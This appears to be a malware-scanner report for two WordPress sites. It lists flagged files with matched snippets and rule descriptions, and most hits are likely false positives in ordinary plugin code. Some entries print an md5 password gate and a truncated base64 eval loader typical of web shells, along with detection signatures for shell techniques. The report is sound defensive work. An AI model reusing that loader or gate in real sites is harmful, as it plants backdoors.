//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 20:47:40 Modified: 2021-05-16 20:47:40 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-08-19 15:53:34 Modified: 2020-08-19 15:53:34 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST)
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenation of `chr` technique is usually used for the obfuscation of malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
|
//var/www/omsk/data/www/intim-omsk2.ru/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2020-08-19 15:53:35 Modified: 2020-08-19 15:53:35 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/omsk/data/www/intim-omsk2.ru/script_smartwall/update.php Size: 9.06 kB Created: 2020-10-21 20:25:26 Modified: 2020-10-21 20:25:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/omsk/data/www/intim-omsk2.ru/script_smartwall/index.php Size: 38.45 kB Created: 2020-10-21 20:25:26 Modified: 2020-10-21 20:25:26 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning MD5 Password protection file, typically used on web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/omsk/data/www/intim-omsk2.ru/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-10-21 20:25:26 Modified: 2020-10-21 20:25:26 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) |
Z3ppbmZsYXRl
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-includes/PHPMailer/PHPMailer.php Size: 166.60 kB Created: 2021-03-17 21:28:10 Modified: 2021-03-17 21:28:10 Dangers: 1
| Description | Match |
|---|
Sign a408f408 Line: 1791 Dangerous Malware Signature (hash: a408f408) |
cmd.exe
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-wp-filesystem-direct.php Size: 16.02 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:25 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $file ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ! $overwrite && $this->exists( $destinat...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-pclzip.php Size: 191.21 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:22 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2780 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3702 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3948 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5677 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/file.php Size: 92.41 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:33 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 703 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$overrides['upload_error_handler'](&$file, $message )
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 21.21 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:26 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid( $owneruid ); return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); return $grouparray['name']; } public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/class-wp-debug-data.php Size: 43.17 kB Created: 2019-12-02 23:36:05 Modified: 2021-03-31 20:12:25 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit php_uname Line: 553 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname( 'm' )
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec( 'gs --version' ); if ( empty( $gs ) ) { $gs = $not_available; $gs_debug = 'not available'; } else { $gs_debug = $gs; } } else { $gs = __( 'Unable to determine if Ghostscript is installed' ); $gs_debug = 'unknown'; } $info['wp-media']['fields']['ghostscript_version'] = array( 'label' => __( 'Ghostscript version' ), 'value' => $gs, 'debug' => $gs_debug, ); if ( function_exists( 'php_uname' ) ) { $server_architecture = sprintf( '%s %s %s', php_uname( 's' ), php_uname( 'r' ), php_uname( 'm' ) ...
| Sign 471b95ee Line: 653 Dangerous Malware Signature (hash: 471b95ee) |
SUHOSIN
| Sign 471b95ee Line: 654 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/wp-admin/includes/ms.php Size: 33.97 kB Created: 2020-10-29 23:44:39 Modified: 2021-03-31 20:12:36 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 562 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:49:53 Modified: 2021-03-17 22:57:57 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 1185 Warning Double var technique is usually used for the obfuscation of malicious code |
${$gloabl_filter_ids_name}
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-12-03 18:46:53 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/profile-builder/assets/lib/Mustache/Engine.php Size: 22.10 kB Created: 2020-03-07 13:50:19 Modified: 2021-03-17 22:57:57 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('?>'.$this->compile($source)); } } $this->log( Mustache_Logger::DEBUG, 'Instantiating template: "{className}"', array('className' => $className) ); $this->templates[$className] = new $className($this); } return $this->templates[$className]; } private function tokenize($source) { return $this->getTokenizer()->scan($source); } private function parse($source) { return $this->getParser()->parse($this->tokenize($source)); } private function compile($source) { $tree = $this->parse($source); $name...
| Sign 11413268 Line: 602 Dangerous Malware Signature (hash: 11413268) |
eval('?>
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/profile-builder/assets/lib/wck-api/wordpress-creation-kit.php Size: 60.54 kB Created: 2020-03-07 13:50:19 Modified: 2021-03-17 22:57:57 Dangers: 2
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns);
}
/**
* @return bool
*/
public static function isInlineJsEnabled()
{
$isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] &&
(trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) {
return false;
}
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js
if (array_key_e...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:28:50 Modified: 2021-05-16 21:28:50 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/ramsey/uuid/src/Provider/Node/SystemNodeProvider.php Size: 3.44 kB Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit php_uname Line: 70 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('a')
| Exploit php_uname Line: 98 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('s')
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] |
passthru('ipconfig /all 2>&1'); break; case 'DAR': passthru('ifconfig 2>&1'); break; case 'FRE': passthru('netstat -i -f link 2>&1'); break; case 'LIN': default: passthru('netstat -ie 2>&1'); break; } return ob_get_clean(); } protected function getSysfs() { $mac = false; if (strtoupper(php_uname('s')) === 'LINUX') { $addressPaths = glob('/sys/class/net/*/address', GLOB_NOSORT); if (empty($addressPaths)) { return false; } array_walk($addressPaths, function ($addressPath) use (&$macs) { $macs[] = ...
| Sign 085a0329 Line: 72 Dangerous Malware Signature (hash: 085a0329) |
ipconfig
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/curl/curl/src/Curl/Curl.php Size: 18.49 kB Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->response_headers = array(); $this->response = curl_exec($this->curl); $this->curl_error_code = curl_errno($this->curl); $this->curl_error_message = curl_error($this->curl); $this->curl_error = !($this->curl_error_code === 0); $this->http_status_code = curl_getinfo($this->curl, CURLINFO_HTTP_CODE); $this->http_error = in_array(floor($this->http_status_code / 100), array(4, 5)); $this->error = $this->curl_error || $this->http_error; $this->error_code = $this->error ? ($this->curl_e...
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/curl/curl/tests/server/php-curl-test/deploy.php Size: 904.00 B Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1
| Description | Match |
|---|
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] |
shell_exec($command); $output .= "<span style=\"color: #6BE234;\">\$</span> <span style=\"color: #729FCF;\">{$command}\n</span>"; $output .= htmlentities(trim($tmp))
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/woo-qiwi-payment-gateway/vendor/qiwi/bill-payments-php-sdk/src/BillPayments.php Size: 18.75 kB Created: 2021-03-17 21:32:01 Modified: 2021-03-17 21:32:01 Warns: 1
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 682 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code |
$scheme.$user.$pass.$host.$port.$path.
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/voronezh/data/www/intim-voronezha.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-25 17:50:40 Modified: 2021-03-17 22:57:58 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
